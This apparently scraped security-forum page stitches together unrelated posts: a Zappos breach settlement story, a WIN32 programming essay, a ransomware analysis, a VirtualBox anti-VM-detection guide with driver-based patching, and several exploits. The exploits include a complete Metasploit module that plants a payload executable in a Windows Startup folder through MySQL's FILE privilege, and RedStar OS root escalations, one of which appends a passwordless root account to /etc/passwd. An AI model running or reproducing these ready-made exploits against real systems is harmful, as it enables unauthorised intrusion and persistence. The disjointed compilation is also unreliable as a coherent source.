Aerosol

## # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse', 'Description' => %q{ This module takes advantage of a file privilege misconfiguration problem specifically against Windows MySQL servers. This module abuses the FILE privilege to write a payload to Microsoft's All Users Start Up directory which will execute every time a user logs in. The default All Users Start Up directory used by the module is Windows 7 friendly. }, 'Author' => [ 'sinn3r', 'Sean Verity <veritysr1980[at]gmail.com' ], 'DefaultOptions' => { 'DisablePayloadHandler' => 'true' }, 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2012-5613'], #DISPUTED ['OSVDB', '88118'], ['EDB', '23083'], ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13'] ], 'Platform' => 'win', 'Targets' => [ [ 'MySQL on Windows', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 01 2012' )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as']), OptString.new('PASSWORD', [ true, 'The password to authenticate with']), OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/']) ]) end def check m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) return Exploit::CheckCode::Safe unless m return Exploit::CheckCode::Appears if is_windows? Exploit::CheckCode::Safe end def peer "#{rhost}:#{rport}" end def query(q) rows = [] begin res = mysql_query(q) return rows unless res res.each_hash do |row| rows << row end rescue RbMysql::ParseError return rows end rows end def is_windows? r = query("SELECT @@version_compile_os;") r[0]['@@version_compile_os'] =~ /^Win/ ? true : false end def get_drive_letter r = query("SELECT @@tmpdir;") drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || '' drive end def upload_file(bin, dest) p = bin.unpack("H*")[0] query("SELECT 0x#{p} into DUMPFILE '#{dest}'") end def exploit unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/') fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") end print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) rescue RbMysql::AccessDeniedError fail_with(Failure::NoAccess, "#{peer} - Access denied") end fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m unless is_windows? fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows") end begin drive = get_drive_letter rescue RbMysql::ParseError fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") end fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive exe_name = Rex::Text::rand_text_alpha(5) + ".exe" dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" exe = generate_payload_exe print_status("#{peer} - Uploading to '#{dest}'") begin upload_file(exe, dest) rescue RbMysql::AccessDeniedError fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)") end register_file_for_cleanup("#{dest}") end end Source

Online retailer Zappos this week settled with attorneys general in nine states, agreeing to pay out $106,000 stemming from a data breach in 2012 that exposed 24 million customers’ information. Massachusetts Attorney General Martha Coakley filed the settlement in Suffolk Superior Court on Wednesday, as did AGs from Arizona, Connecticut, Florida, Kentucky, Maryland, North Carolina, Ohio and Pennsylvania. Under the agreement, the Las Vegas company must also take necessary actions to better protect its customers’ information going forward. “Our office will continue to hold retailers accountable for failing to follow their own policies regarding consumer data that they maintain, and make sure that all companies have reasonable data security measures in place,” Coakley said in a press release on Wednesday. Each state is getting roughly the same cut of the $106,000. Massachusetts, which had approximately 740,000 residents affected will receive more than $11,000. As part of the agreement, Zappos will have to maintain and comply to its information security policies and provide each attorney general with those policies and how they pertain to customer information. The company also must also undergo a third party audit and provide that audit report to the attorney generals, along with copies of reports that illustrate how it complies to the Payment Card Industry Data Security Standard, for two years. In addition, to bolster security awareness the e-merchandiser must provide annual training to its 1,500 employees. Attackers initially infiltrated the company’s network in January 2012 via a server in Kentucky. Files on that server were ultimately discovered to contain customers’ names, billing and shipping addresses, telephone numbers, their log-in credentials and the last four digits of their credit card numbers. Following the breach the company, which sells clothing, accessories and other merchandise aside from shoes, expired all affected users’ passwords and required them to reset them. According to Coakley aside from the last four digits of their cards, there was no other payment card information — no full debit or credit card numbers — implicated in the breach. Source

Daca intereseaza pe cineva : https://rstforums.com/forum/93955-security-hacking-apps-android-devices.rst

@Nytro unde le gasesti bre? al doilea e EPIC

Multumim, era numai bun pentru farse la telefon daca nu era limita asta de timp...

@axeman18 sunt aici pe forum stai asa! #1 https://rstforums.com/forum/93500-website-hacking-101-a.rst #2 https://rstforums.com/forum/93501-website-hacking-101-part-ii.rst #3 https://rstforums.com/forum/93503-website-hacking-101-part-iii.rst #4 https://rstforums.com/forum/93504-website-hacking-part-iv-tips-better-website-security.rst #5 https://rstforums.com/forum/93499-website-hacking-part-v.rst

Mai jos aveti un articol destul de interesant! ================================== Beginning in the fall of 2014, something exciting started to happen. Microsofts new approach of low cost (and some times free) versions of Windows (x86) for OEM’s building small and low cost devices began to take shape. There is little doubt in the mind of this developer that this was a smart move on their part. But things would not really have taken shape if it were not for Intel’s amazing efforts in bringing to market extremely small , yet powerful PC form factors. The 7 inch Windows tablets, TV Box style mini-PC’s and soon the PC-Stick form factor. While likely this opens up all sorts of possibilities and markets for consumer oriented products, it also opens up all sorts of possiblities for education and business. Inexpensive $99 Windows tablets brings many new options for business and education. TV Box and PC on a Stick Windows devices turn already available large screen televisions into powerful educational and business tools, as well as brings many opportunies in the consumer markets. What this means for developers These amazing new devices though come with a hitch. While in many ways it may provide even more power and choices than either Android or Chrome (in my opinion) it also has its challenges for Windows software developers. Much of software development has gone cross platform today and with that, limitations which are simply part of the nature of cross platform design. Cross platform usually means some compromise, compared to coding for a native platform. Cross platform tends to lean towards machine independent programming methodologies, such as scripting languages or compile on the fly on the end user machine. Yet, experienced programmers likely recognize the raw power of using actual native code compilers for a specific platform. One can code for high performance using every tool available for that platform as well as for the hardware (in this case Intel x86 SOC’s). The new Windows PC form factors though bring a challenge to developers, since some current development systems tend to lean towards the more powerful PC platforms, rather than the new PC form factors with minimal hardware. For years the lowly Intel Atom CPU (SOC actually, which means System on a Chip) was sadly the laughing stock among some software developers. Having been spoiled by the ICore CPU’s, large and fast SSD disk drives and huge amounts of RAM memory (8,16 or more gigabytes) software developers , if they were honest about it, likely didn’t want to see their software run on such lowly devices. Rather than see the Atom SOC as a benefit (small size, low power requirement, low cost), they likely saw it as a problem to be avoided. But the new breed of tiny Windows devices, along with the new low cost Windows solutions from Microsoft, are bringing some very exciting opportunities for developers if they can simply realize the opportunities here. The Intel Atom SOC is no laughing stock in my mind, but a very smart, well calculated design which combined with the low cost Windows is an industry game changer. Low cost, small size and reasonable power (if properly used) makes this a very positive thing for the tech industry, which should be utilitized. As a long time programmer and having helped a number of businesses find cost effective solutions to their computer and software needs, I have found that cost matters. If a business (or a school) can accomplish something for significantly less money, while still getting a solid solution, then it is something a software developer or IT person should serious consider and promote. So hows does a software developer help others get more from the new generation of small Windows devices ? Its been there all the time, but you may not have noticed One of the amazing things I have noticed about the Windows operating system over the years has been how consistant it has been in supporting the core WIN32 API. Programming techniques I learned over 15 years ago, still work almost flawlessly today. I have been an active WIN32 programmer for the last 15 years now and the more I learn the better it gets. But what really amazed me is how tiny native coded WIN32 apps can be and how fast they can run and how little hardware resources they require. Since Windows 95, core features in Windows have not changed but they also demonstrate the well planned design of the core operating system. How I have learned how to do all sorts of tricks with the simple and lowly DLL (Dynamic Link Library). It is simple to design software which can even deal with the slight changes in the operating system over the years, while maintaining full backward compatiblity, even as far back as to Windows 95. Even the lowly GDI still has some amazingly raw power in it. One of my favorite features in the WIN32 API is the lowly DIBSection (device independent bitmaps). It has been there since Windows 95 and yet this simple API engine can be used to build all sorts of powerful homemade graphic engines. Once I tapped into the DIBSection API’s all sorts of possibilities arose. Another feature of the Windows API which still amazes me is the customization features built into it. Things like OwnerDraw, CustomDraw, Subclassing and Superclassing allow programmers to customize almost anything. Even core API functionality like the Common Dialogs were designed for customization. One can easily create their own “hook” procedure into them and change their functionality. For an experienced WIN32 programmer, rather than see limitations in the WIN32 API, they more likely see all sorts of possibilities. The real power of the WIN32 API But the real power of the WIN32 API is how little resources it requires and how tiny and fast ones applications are. The typical programmer today requires a heavy weight PC for development and their tools usually take up not megabytes, but usually many gigabytes of disk space just to be installed. Not so with WIN32 programmers. Some WIN32 programmers entire development system (aside from API docs of course, but that one can get online) may only take a few megabytes of disk space. In my case the IDE and Compiler I use only takes up about 20 megabytes of disk space and I can run it on literally any Windows (x86) PC made in the last 15 years, possibly even further back with even as little 256 meg RAM or less. My Visual Designer front end, which my company built, as well as a complex, full featured GUI framework, only takes about 3 megabytes of disk space (plus another 6 megabytes for the help file). It too can run on most likely any Windows PC made during the last the 15 years. Native code compilers are an area which deserves a closer look by software developers. The coming mini-device Windows PC’s can be made to perform amazingly well, despite their limitations, if we as programmers learn how to tap into the native WIN32 API. The extra expense in software development will be easily compensated by the savings when using these low cost devices. Imagine a school system only paying $99 per student for a tablet and still getting a powerful system. Imagine the savings to businesses by finding ways to use such inexpensive devices. Personally, I would like to see a real Windows version device of a Raspberry PI size and cost. Get rid of the operating system bloat (like dot.net) and provide simple and easy to use compilers capable of tapping into the WIN32 API directly and it is conceivable to have a tiny Raspberry PI size Windows PC device which could sell for only $49 (or less) and be more powerful than the PI. If you doubt the importance of native code compiling, watch the video of Herb Sutter’s talk “Why C++?”. Still doubt the power of writing software using the native WIN32 API (as well as OpenGL, Direct-X, etc.) ? Check out two programing libraries this French developer has created: GDImage, a powerful graphic engine with a tiny footprint. WinLift, a powerful window skinning engine also with a tiny footprint. Both were written using native WIN32 coding and even without any object oriented classes typical of C++. Both were written using Powerbasic for 32 bit Windows and GDImage was ported to C++ for a 64 bit version. 2015 will be an interesting year for tiny Windows (x86) devices Source

Attached are two variants of a new crypto malware that first showed up a few days ago. The encryption of the first variant is rather simplistic. It just does a simple XOR using a static key that is used on every system. The key used is 0x3035353331623139626238343662313863303966393739656562343239616433. The second variant changed the encryption scheme. It now generates a new per-infection key on each system. This per-infection key appears to be the SHA256 of something. I didn't look into of what exactly yet because the malware author failed at securing his server and left all generated keys open to be downloaded by anyone. If someone wants a dump of all keys, please let me know. The per-infection key is then used to derive a new encryption key for every 0x4000 byte block of a file that is being encrypted. The key for the block is essentially the SHA256 of the per-infection key plus the file name including path plus the index of the block being encrypted starting with 1. So if the per-infection key is d9ae3f2910a4de28315216bd1152746db1b539fa3b545ac7d24401f3d39ec581 for example and the file being encrypted is located in C:\file.ext the first 0x4000 bytes would be encrypted using SHA256("d9ae3f2910a4de28315216bd1152746db1b539fa3b545ac7d24401f3d39ec581C:\file.ext1"), the second 0x4000 bytes would be encrypted with SHA256("d9ae3f2910a4de28315216bd1152746db1b539fa3b545ac7d24401f3d39ec581C:\file.ext2") and so on. I didn't look into how the malware derives the key stream it uses to XOR the original bytes with from the SHA256 yet due to lack of time. I hope to get to it later today but I am not that familiar with VB6 and the disassembled code looks horrible. So if one of you with more experience in reversing VB6 code wants to give it a shot, the function that encrypts a block using the SHA256 derived as the key for the block is located at 0x0042FF80 in the variant 2 sample. pclock_variants.rar Pass: infected Source

Step by step guide for VirtualBox Hardened (4.3.14+) VM detection mitigation configuring. Later if nothing changes in Oracle product this will be moved to public forums. This guide and AntiVMDetect only applies to x86-64 Windows platform. Guide consists the following parts: VirtualBox Installation AntiVMDetect installation and configuring VirtualBox VM installation and configuring 1) VirtualBox installation 1.1) Do clean installation of latest VirtualBox. Clean mean - you must firstly uninstall any other versions of VirtualBox and reboot Windows to complete uninstallation. This ensures that no old VBox files will left in system memory and disk. Unfortunately VBox setup sometimes can't do complete removal without reboot. 1.2) Start installation and select VirtualBox components to install as shown on fugure below. DO NOT INSTALL VirtualBox Networking, otherwise you will have problems with part 2 and 3 of this guide, as VirtualBox driver cannot be stoped when VirtualBox networking is active. This feature is pretty useless however, NAT still will be available for virtual machines. 2) AntiVMDetect VM installation and configuring 2.1) What we will target: DMI Information; - IDE/AHCI devices (harddisks, cd-rom's); - ACPI OEM Information; - Ethernet Adapter MAC address; - PXE Boot data; - ACPI DSDT (Differentiated System Description Table); - ACPI SSDT (Secondary System Descriptor Table); - VGA Video BIOS data; - BIOS data; - VM splashscreen (optional, just for nice looking). How do we target this: we remove all sings of Oracle/Innotek signatures inside original data extracted by various ways from Oracle VirtualBox itself and then use documented and "not documented" ways to set these customized data for specific virtual machine using batch scripts, see 2.2 for more info and example. 2.2) Run the following commands combined in batch script. As parameter to script give a full virtual machine name you want to use, in this example it is "sbox" PUT YOUR OWN RANDOM information in the data fields, DO NOT USE THE SAME AS BELOW so this can't be used as detection markers. Script for VM with IDE controller @ Echo off rem vboxman is the full path to the vboxmanage executable rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc) set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe" set vmscfgdir=D:\Virtual\VBOX\Settings\ %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "5" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "9" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "1" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "0" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "Asus" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "MyBook5,2" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "1.0" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "CSN12345678901234567" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "FM550EA#ACB" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "Ultrabook" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Asus" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Mac-F22788AA" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "3.0" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "BSN12345678901234567" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Board Loc In" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10 %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "Asus Inc." %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 10 %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "Mac-F22788AA" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "CSN12345678901234567" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "WhiteHouse" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A" %vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/ModelNumber" "Hitachi HTS543232A7A384" %vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/FirmwareRevision" "ES2OA60W" %vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/SerialNumber" "2E3024L1T2V9KA" %vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ModelNumber" "Slimtype DVD A DS8A8SH" %vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/FirmwareRevision" "KAA2" %vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/SerialNumber" "ABCDEF0123456789" %vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIVendorId" "Slimtype" %vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIProductId" "DVD A DS8A8SH" %vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIRevision" "KAA2" %vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "ASUS" %vboxman% modifyvm "%1" --macaddress1 6CF0491A6E02 cd /d %vmscfgdir% %vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin" %vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin" %vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin" %vboxman% modifyvm "%1" --bioslogoimagepath "%vmscfgdir%splash.bmp" @ pause Script for AHCI controller rem @ Echo off rem vboxman is the full path to the vboxmanage executable rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc) set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe" set vmscfgdir=D:\Virtual\VBOX\Settings\ %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "5" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "9" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "1" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "0" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "Asus" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "MyBook5,2" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "1.0" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "CSN12345678901234567" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "FM550EA#ACB" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "Ultrabook" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Asus" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Mac-F22788AA" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "3.0" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "BSN12345678901234567" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Board Loc In" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10 %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "Asus Inc." %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 10 %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "Mac-F22788AA" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "CSN12345678901234567" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "WhiteHouse" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A" %vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "Hitachi HTS543232A7A384" %vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "ES2OA60W" %vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "2E3024L1T2V9KA" %vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "Slimtype DVD A DS8A8SH" %vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "KAA2" %vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "ABCDEF0123456789" %vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype" %vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVD A DS8A8SH" %vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "KAA2" %vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "ASUS" %vboxman% modifyvm "%1" --macaddress1 6CF0491A6E02 cd /d %vmscfgdir% %vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin" %vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin" %vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin" %vboxman% modifyvm "%1" --bioslogoimagepath "%vmscfgdir%splash.bmp" @ pause NOTE: These commands: VBoxInternal/Devices/acpi/0/Config/DsdtFilePath VBoxInternal/Devices/acpi/0/Config/SsdtFilePath Supported by VirtualBox, it has code to successfully load and work with this data, but these two commands not listed as acceptable by VirtualBox. If you are interested in more details see VirtualBox source: src\VBox\Devices\PC\ACPI\VBoxAcpi.cpp -> Dsdt/Ssdt src\VBox\Devices\PC\DevACPI.cpp -> CFGMR3AreValuesValid The only way we can use them - force VirtualBox to allow them. Without this patch both commands will not be recognized by VBox as acceptable and VM won't start. Additionally even after heavy reconfiguring some virtual machine devices data still will point on Oracle - PCI HWID (hardware identificators). For more info about possible vm detection methods see our VMDE. The only way we can change these ID - memory patch of the VBoxDD.dll where located most of VM related logic. Unfortunatelly in the patetic attempt to stop VirtualBox exploitation attempts Oracle have made a decision to create a some kind of "patchguard" for VBox, known as "Hardened VirtualBox". See viewtopic.php?f=11&t=1911&start=50 for more details. 2.3) Installing AntiVMDetect helper. Use loader.exe from attach. It is command line utility which serves purpose of bypassing Hardened VirtualBox crap. Without param it will show list of possible commands, here are they: where "tsugumi" is a kernel mode x64 driver used for VBox patching. -l command Example of usage, installation batch script (must be run with admin privileges). D:\Virtual\Vbox\Settings\loader.exe -l [@ pause This command load driver and it starts monitoring VirtualBox dlls loading. -u command Example of usage, uninstallation batch script (must be run with admin privileges). D:\Virtual\Vbox\Settings\loader.exe -u @pause This command unloads tsugumi driver and flushes Windows file cache and standby list, so Windows force reloading dlls from disk into memory and VirtualBox will be able use unpatched dlls. What/Where/Data for patch stored in the "Tsugumi" driver key under "Parameters" subkey in "PatchData" value -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\tsugumi\Parameters. Loader will store here patch information that later will be used by driver. Note: Driver ONLY patch ONE VirtualBox dll in memory, nothing else in system modified. This mechanism supports proving custom patch data, you can specify path to custom patch data file as second param of "-l" command, e.g. loader.exe -l "c:\vbox\mycustompdata.bin" Patch data described as set of linked chains typedef struct _BINARY_PATCH_BLOCK { ULONG VirtualOffset; UCHAR DataLength; UCHAR Data[1]; } BINARY_PATCH_BLOCK, *PBINARY_PATCH_BLOCK; Where: VirtualOffset - is v.offset in VirtualBox VBoxDD dll. DataLength - length of input patch data Data - your input data to write with length of DataLength Once patch driver installed by loader it will enable ACPI tables related commands, fake HWID's and patch several instructions with hardcoded VBox signatures. This driver has no interface, it works semi-automatic, relying only on PatchData described above. All source of loader, driver, support tools can be found in attach. 3) VirtualBox VM installation and configuring 3.1) Create a new virtual machine (in this example it named "sbox") and configure it in the following way: Motherboard Processor Acceleration (make sure your CPU support virtualization technologies Display (UNCHECK any kind of acceleration here - totally bugged and previously exploited feature) Storage* * We use here IDE controller, you can use AHCI it is not important. Better use dynamically allocated VDI images, with size not less than 16 GB, as HDD size is VM indicator for some lame malware. Network* *For example used to access host computer via FTP and provide web access to the virtual machine and malware. 3.2) Install Windows (any you want, in this example we used machine with Windows XP SP3 RTM). DO NOT INSTALL VirtualBox Additions. NEVER. Once installed you may consider your VM as lost. How then copy all your instruments/tools/etc to the VM space? Do a prebuild ISO image, copy all your stuff on it, use VM CD-ROM drive for it. Copy a small ftp client to the VM and use Host-FTP-Server -> Guest->FTP-Client. In this example we copied all what we need on a prebuilt ISO image called VBoxAfterInstall.ISO, mounted it in virtual CD-ROM and then used our self made FTP server for other file transfers to the VM. Attachment structure loader.exe - driver loader install.cmd - runs loader with -l param, need admin rights uninstall.cmd - runs loader with -u param, need admin rights data - modified and original data from VBox 4.3.16, batch scripts loader - partial source code of loader driver - partial source code of loader, use WDK to build util --- -> biosextract - tool and source of it to extract bioses from virtualbox VBOXDD2.DLL | -> vmde - test tool to detect vm presense | -> patchlist - test tool for patch hex construction Note: for patching DSDT table - aware that it is CRC protected, so you need to re-calculate and write proper CRC otherwise your customized machine won't load (https://taesoo.org/files/code/acpi.c.html). 05/01/15 update loader changes + Resolved few startup issues; + Support for new Microsoft versioning; + Built in tables for 4.3.16, 4.3.18 and 4.3.20 versions, so you no longer need to load them as external file (however you still can do that supplying patch table filename as second parameter to the loader); + "VirtualBox Host-Only Network" connection no longer needs to be disabled for starting this loader, it will disable and reenable it automatically; + New presets for EFI (IDE/AHCI) VirtualBox machines (see hidevm_efiahci.cmd, hidevm_efiide.cmd). Note: EFI supported by VirtualBox only from 4.3.20; + Updated all bios data and ACPI tables up to current 4.3.20 version; + More source included, source that wasn't changed (driver) is not included in this pack. VBOX Pass: virtualbox Source

RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit) Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit" which can be abused to execute commands on boot. An example exploitation of this vulnerability is shown here https://github.com/HackerFantastic/Public/blob/master/exploits/redstar2.0-localroot.png PoC: /bin/echo "r00t::0:0::/tmp:/bin/bash" >> /etc/passwd su - root ## Source: http://www.openwall.com/lists/oss-security/2015/01/09/6 Source RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app) The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. UnFortunately, they left a big security hole: the Software Manager (swmng.app), which runs as root through sudo and will install any RPM package, even if unsigned. To get root, get this RPM package I made into Red Star through an ISO (if you're using a virtual machine) or USB key, double-click it to open it with the Software Manager, and click through the blue buttons until it’s done. After that, run rootsh to get a root shell. Being a RedHat-based system (hinting on Fedora 15), SELinux will prevent you from doing some things, but disabling it is a matter of running setenforce 0 as root. Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E Mirror: http://www.exploit-db.com/sploits/redstarroot.rpm ## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1 Source RedStar 3.0 Desktop - Privilege Escalation 